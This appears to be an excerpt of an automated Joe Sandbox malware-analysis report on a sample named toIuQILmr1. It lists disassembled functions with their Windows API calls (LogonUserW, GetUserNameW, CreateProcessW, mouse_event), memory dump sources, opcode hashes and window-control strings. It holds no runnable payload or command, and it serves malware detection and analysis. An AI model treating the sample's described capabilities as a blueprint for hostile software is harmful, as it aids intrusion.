                                          • Opcode ID: 3df143d8332f68f3188a3e5937baa40240d35d0c56f3a38417817f9a2a77cd92
                                          • Instruction ID: 7aadddccee80906d653210ca5ac735b941ab9e46696e55f28478111fd60457d4
                                          • Opcode Fuzzy Hash: 3df143d8332f68f3188a3e5937baa40240d35d0c56f3a38417817f9a2a77cd92
                                          • Instruction Fuzzy Hash: 5FF06D31240394AFDB21DF58DC05FC63BA5EB09760F14485AFA11372E1CB707824D7A0
                                          Function 00E34EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E34F18
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: 14c59d20426498a34a21a262939d7b4c9d2402a51702e4c0850a0ac89f957374
                                          • Instruction ID: 904d43a65adf1fea26bf3bfe8d5b2200bc91c57bf28dcc611ccb04e915848555
                                          • Opcode Fuzzy Hash: 14c59d20426498a34a21a262939d7b4c9d2402a51702e4c0850a0ac89f957374
                                          • Instruction Fuzzy Hash: A5D09EF43646057DFC194B21AC1FFB71909E340796F9C79C97201B94C1A8E57C54E035
                                          Function 00E28C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E288D1), ref: 00E28CB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: fa5ef24a0412b47405bdc02cbfd177639d4c9fe744cd3fa5febd7845f382e3fd
                                          • Instruction ID: fc0db66b0c4465f98d60ace31b6424d8d32828c7b9885df6ba28e3fa43ac6df0
                                          • Opcode Fuzzy Hash: fa5ef24a0412b47405bdc02cbfd177639d4c9fe744cd3fa5febd7845f382e3fd
                                          • Instruction Fuzzy Hash: EFD05E3226060EAFEF018EA4DC01EAE3B69EB04B02F408511FE15D50A1C775D835AB60
                                          Function 00E5CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00E0BC0C,?,?,?,?,?,?), ref: 00E5CC24
                                            • Part of subcall function 00E5B8EF: _memset.LIBCMT ref: 00E5B8FE
                                            • Part of subcall function 00E5B8EF: _memset.LIBCMT ref: 00E5B90D
                                            • Part of subcall function 00E5B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E97F20,00E97F64), ref: 00E5B93C
                                            • Part of subcall function 00E5B8EF: CloseHandle.KERNEL32 ref: 00E5B94E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                          • String ID:
                                          • API String ID: 2364484715-0
                                          • Opcode ID: 749794f2de8ebbbe49245f7933a9e65985ac2712d78950c510a1616398ec67dc
                                          • Instruction ID: b80f71d686532ab35b6768dc99e8259ec4d57db22f314772430894d2d4dda581
                                          • Opcode Fuzzy Hash: 749794f2de8ebbbe49245f7933a9e65985ac2712d78950c510a1616398ec67dc
                                          • Instruction Fuzzy Hash: 04E01231100208DFCB05AF05ED10E8577A5FB08342F014812FE096B2B2CB31A964EF50
                                          Function 00DD167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00DD1AEE,?,?,?), ref: 00DD16AB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogLongNtdllProc_Window
                                          • String ID:
                                          • API String ID: 2065330234-0
                                          • Opcode ID: eba8ce6bb41c231bced8c9fce4a982ff946cb757716e81e53036d616432ad408
                                          • Instruction ID: b1214fb0f0ce81f63894f2735abcfcc99b92cfc7036fc278feb6a593a36de4a1
                                          • Opcode Fuzzy Hash: eba8ce6bb41c231bced8c9fce4a982ff946cb757716e81e53036d616432ad408
                                          • Instruction Fuzzy Hash: 82E0EC35100208BFCF1AAF91DC12E643B26FB58354F10841AFA451A2A1CA32A921DB60
                                          Function 00E5CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL ref: 00E5CBA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogNtdllProc_
                                          • String ID:
                                          • API String ID: 3239928679-0
                                          • Opcode ID: beecd96bb8852b004f73d23df4a687157f08706ab970b685361057f75034e8c3
                                          • Instruction ID: 26725a7a78a95ef7991651254ab3a9ac36c5793d3057099e102f1ab202b44bef
                                          • Opcode Fuzzy Hash: beecd96bb8852b004f73d23df4a687157f08706ab970b685361057f75034e8c3
                                          • Instruction Fuzzy Hash: 76E0E235200248EFCB01DF88E844D863BA5AB1D300F014055FA0557262CB71A824EBA1
                                          Function 00E5CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL ref: 00E5CB75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogNtdllProc_
                                          • String ID:
                                          • API String ID: 3239928679-0
                                          • Opcode ID: a4d57eb5483f865f4d98aabb25fa30617c1f7ef5e52b8568b581377eb26de499
                                          • Instruction ID: 7ef54e830e106ee449b98ee6d4fc876706e8cdbfdb7c3ef0141bba3a87485769
                                          • Opcode Fuzzy Hash: a4d57eb5483f865f4d98aabb25fa30617c1f7ef5e52b8568b581377eb26de499
                                          • Instruction Fuzzy Hash: 2DE0E235204248AFCB01DF88E884E863BA5AB1D300F014055FA0557262CB71A820EB61
                                          Function 00DD16B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DD20D3
                                            • Part of subcall function 00DD201B: KillTimer.USER32(-00000001,?,?,?,?,00DD16CB,00000000,?,?,00DD1AE2,?,?), ref: 00DD216E
                                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00DD1AE2,?,?), ref: 00DD16D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                          • String ID:
                                          • API String ID: 2797419724-0
                                          • Opcode ID: f7e44619f6bab33272605f0ae79ea7183dddf2486b6acba835d00117ac696a54
                                          • Instruction ID: 071f7e075698ef2ccdf3edc3a43180bf78ea9502f8dbdc54e7f8dbf3dab1a06b
                                          • Opcode Fuzzy Hash: f7e44619f6bab33272605f0ae79ea7183dddf2486b6acba835d00117ac696a54
                                          • Instruction Fuzzy Hash: 05D012301403087BDE122FA1DC17F693A19DB64750F508422FA04792D3CA71A810A578
                                          Function 00E12230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E12242
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 6dd965d46612157c6e9466c621e3bb726990f3af33b9187ba67efff358227a9c
                                          • Instruction ID: 3660a8c167106d2e5eb1d7810e4d1e9d9e29264e85ce3a005188844ac7a7dec7
                                          • Opcode Fuzzy Hash: 6dd965d46612157c6e9466c621e3bb726990f3af33b9187ba67efff358227a9c
                                          • Instruction Fuzzy Hash: B6C04CF1C05109DBDB05DB90D988DEE77BCAB04315F144495E101F2140D7749B448A71
                                          Function 00DFA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00DFA36A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: ecdf108e6c81d72824768aa9a0060bc06ffe112a105092869d1077f2d928abf3
                                          • Instruction ID: 4fe64c3e6d7fabeea7875e3a2e064e8106fc688e310154dbe79e840b7cfa9fa1
                                          • Opcode Fuzzy Hash: ecdf108e6c81d72824768aa9a0060bc06ffe112a105092869d1077f2d928abf3
                                          • Instruction Fuzzy Hash: 1BA0113000020CAB8A002F82EC08888BFACEB002A2B008020F80C800328B32A8208A80
                                          Function 00DE8A0E Relevance: .6, Instructions: 608COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6260c829435dc066319698bea4dab1178577a49f903abacc4d87b36486aec028
                                          • Instruction ID: 0963a4775617902b557725e6adcf9ed25325e107a16c12ac0f5cfe65673a8507
                                          • Opcode Fuzzy Hash: 6260c829435dc066319698bea4dab1178577a49f903abacc4d87b36486aec028
                                          • Instruction Fuzzy Hash: 9D224A315016A5CBCF28EB16D58467DB7B1EB42304F39846AD89ABB291DB30DD81EB70
                                          Function 00DF2405 Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: f30c70b9f1be8254a76066fcf9e420dea1bc3db7f76f7552c0160f44a4fcd935
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: 4DC180372050974ADB2D863A943403EBAE15EA27B131F875DE9B3CB5C4EF20D624E630
                                          Function 00DF283A Relevance: .3, Instructions: 341COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 8d461e5956770b558f0251c5cd86b8018f713ddc30feb2f3e242e758f7a4568a
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: 5BC1A0372051974ADB2D463A943403EBBE15EA27B131F876DE9B2DB4C4EF20D624E630
                                          Function 01156318 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction ID: d566227ee88601eac5d493776900499baad0fbc28ab2e5d24d6bd92aa8c50cf2
                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction Fuzzy Hash: 6141D571D1051CDBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                          Function 01156208 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction ID: ea9e86f46915e286ade78313b625c8b82b3955fc87bac3c2d305992b6ac556d1
                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction Fuzzy Hash: 6F019278A01109EFCB88DF98C5909AEF7B5FB48310F608599DC19A7705D730AE51DF80
                                          Function 011561A8 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction ID: c64f97fd6577ccb8d6171446d7614f3f6f01b09fa21dc4b9fb8c1531df992343
                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction Fuzzy Hash: 95019278A00109EFCB88DF98C5909AEF7B6FB88310F608599DC19A7301D730AE51DB80
                                          Function 01154B18 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                          Function 00E537F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,00E5F910), ref: 00E538AF
                                          • IsWindowVisible.USER32(?), ref: 00E538D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: f8744adf2bf8829c1799f14f2745430827fc760ec6ccaa48dddb88d5b8f19740
                                          • Instruction ID: 6d7f55809a71ed5f3254903102f4c4f9c80f1098743be4238ddafe67ffe8b293
                                          • Opcode Fuzzy Hash: f8744adf2bf8829c1799f14f2745430827fc760ec6ccaa48dddb88d5b8f19740
                                          • Instruction Fuzzy Hash: AAD188302043159BCB14EF20C851A6AB7A5EF95385F116859FC867B7A3CB31EE0ECB61
                                          Function 00E5A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00E5A89F
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E5A8D0
                                          • GetSysColor.USER32(0000000F), ref: 00E5A8DC
                                          • SetBkColor.GDI32(?,000000FF), ref: 00E5A8F6
                                          • SelectObject.GDI32(?,?), ref: 00E5A905
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E5A930
                                          • GetSysColor.USER32(00000010), ref: 00E5A938
                                          • CreateSolidBrush.GDI32(00000000), ref: 00E5A93F
                                          • FrameRect.USER32(?,?,00000000), ref: 00E5A94E
                                          • DeleteObject.GDI32(00000000), ref: 00E5A955
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E5A9A0
